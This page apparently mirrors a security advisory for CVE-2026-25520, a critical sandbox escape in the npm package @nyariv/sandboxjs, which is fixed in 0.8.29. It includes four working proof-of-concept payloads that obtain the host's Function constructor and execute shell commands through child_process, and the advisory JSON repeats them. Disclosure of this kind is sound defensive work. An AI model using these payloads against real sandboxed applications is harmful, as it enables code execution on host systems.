GHSA-58JH-XV4V-PCX4

Vulnerability from github – Published: 2026-02-05 20:41 – Updated: 2026-02-06 21:42
VLAI?
Summary
@nyariv/sandboxjs has a Sandbox Escape issue
Details

Summary

The return values of functions aren't wrapped. Object.values/Object.entries can be used to get an Array containing the host's Function constructor, by using Array.prototype.at you can obtain the hosts Function constructor, which can be used to execute arbitrary code outside of the sandbox.

Details

The return values of functions aren't wrapped, chaining function calls allows bypassing most validation/sanitization.

PoC

const s = require('@nyariv/sandboxjs').default;
const sb = new s();

payload = `
console.log(
  Object.values(this).at(0)(
    "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
  )(),
);
`

sb.compile(payload)().run();

const s = require("@nyariv/sandboxjs").default;
const sb = new s();

payload = `
console.log(
  Object.entries(this)[0].at(1)(
    "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
  )(),
);
`

sb.compile(payload)().run();

const s = require("@nyariv/sandboxjs").default;
const sb = new s();

payload = `
console.log(
  Object.entries(this)
    .at(0)
    .map((f) => {
      if (typeof f === 'function') {
        f.call('', 'return process')()
          .getBuiltinModule('child_process')
          .execSync('ls -lah', { stdio: 'inherit' });
      }
    }),
);
`

sb.compile(payload)().run();

const s = require("@nyariv/sandboxjs").default;
const sb = new s();

payload = `
const t = (f) => {
  f.call('', 'return process')()
    .getBuiltinModule('child_process')
    .execSync('ls -lah', { stdio: 'inherit' });
};
console.log(t.call(...Object.entries(this)[0]));
`

sb.compile(payload)().run();

Impact

Sanbox Escape -> RCE

Severity ?
10.0 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.8.28"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@nyariv/sandboxjs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.29"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25520"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-05T20:41:28Z",
    "nvd_published_at": "2026-02-06T20:16:10Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nThe return values of functions aren\u0027t wrapped. `Object.values`/`Object.entries` can be used to get an Array containing the host\u0027s `Function` constructor, by using `Array.prototype.at` you can obtain the hosts `Function` constructor, which can be used to execute arbitrary code outside of the sandbox.\n\n### Details\n\nThe return values of functions aren\u0027t wrapped, chaining function calls allows bypassing most validation/sanitization. \n\n### PoC\n\n```js\nconst s = require(\u0027@nyariv/sandboxjs\u0027).default;\nconst sb = new s();\n\npayload = `\nconsole.log(\n  Object.values(this).at(0)(\n    \"return process.getBuiltinModule(\u0027child_process\u0027).execSync(\u0027ls -lah\u0027).toString()\",\n  )(),\n);\n`\n\nsb.compile(payload)().run();\n```\n\n```js\nconst s = require(\"@nyariv/sandboxjs\").default;\nconst sb = new s();\n\npayload = `\nconsole.log(\n  Object.entries(this)[0].at(1)(\n    \"return process.getBuiltinModule(\u0027child_process\u0027).execSync(\u0027ls -lah\u0027).toString()\",\n  )(),\n);\n`\n\nsb.compile(payload)().run();\n```\n\n```js\nconst s = require(\"@nyariv/sandboxjs\").default;\nconst sb = new s();\n\npayload = `\nconsole.log(\n  Object.entries(this)\n    .at(0)\n    .map((f) =\u003e {\n      if (typeof f === \u0027function\u0027) {\n        f.call(\u0027\u0027, \u0027return process\u0027)()\n          .getBuiltinModule(\u0027child_process\u0027)\n          .execSync(\u0027ls -lah\u0027, { stdio: \u0027inherit\u0027 });\n      }\n    }),\n);\n`\n\nsb.compile(payload)().run();\n```\n\n```js\nconst s = require(\"@nyariv/sandboxjs\").default;\nconst sb = new s();\n\npayload = `\nconst t = (f) =\u003e {\n  f.call(\u0027\u0027, \u0027return process\u0027)()\n    .getBuiltinModule(\u0027child_process\u0027)\n    .execSync(\u0027ls -lah\u0027, { stdio: \u0027inherit\u0027 });\n};\nconsole.log(t.call(...Object.entries(this)[0]));\n`\n\nsb.compile(payload)().run();\n```\n\n### Impact\n\nSanbox Escape -\u003e RCE",
  "id": "GHSA-58jh-xv4v-pcx4",
  "modified": "2026-02-06T21:42:23Z",
  "published": "2026-02-05T20:41:28Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-58jh-xv4v-pcx4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25520"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nyariv/SandboxJS/commit/67cb186c41c78c51464f70405504e8ef0a6e43c3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nyariv/SandboxJS"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@nyariv/sandboxjs has a Sandbox Escape issue"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.